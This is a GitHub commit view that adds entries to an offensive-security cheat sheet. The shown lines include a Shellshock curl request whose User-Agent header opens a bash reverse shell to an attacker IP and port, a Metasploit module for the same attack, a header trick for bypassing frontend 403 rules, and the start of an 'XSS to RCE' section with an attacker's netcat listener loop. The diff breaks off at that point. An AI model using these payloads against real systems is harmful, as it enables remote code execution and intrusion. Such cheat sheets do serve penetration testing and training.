Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-12-02 16:54:37 +05:00 committed by GitHub
parent d5ff6fce86
commit 5e859397c5
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -531,6 +531,12 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://Re
`use multi/http/apache_mod_cgi_bash_env_exec`
### Symfony / Frontend server rule bypass
If we have don't have access to an endpoint could be an admin panel , we can just request for a `/` and at that point in either `X-Original-URL` or ` X-Rewrite-Url`
https://githubmemory.com/repo/sting8k/BurpSuite_403Bypasser/issues/4
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done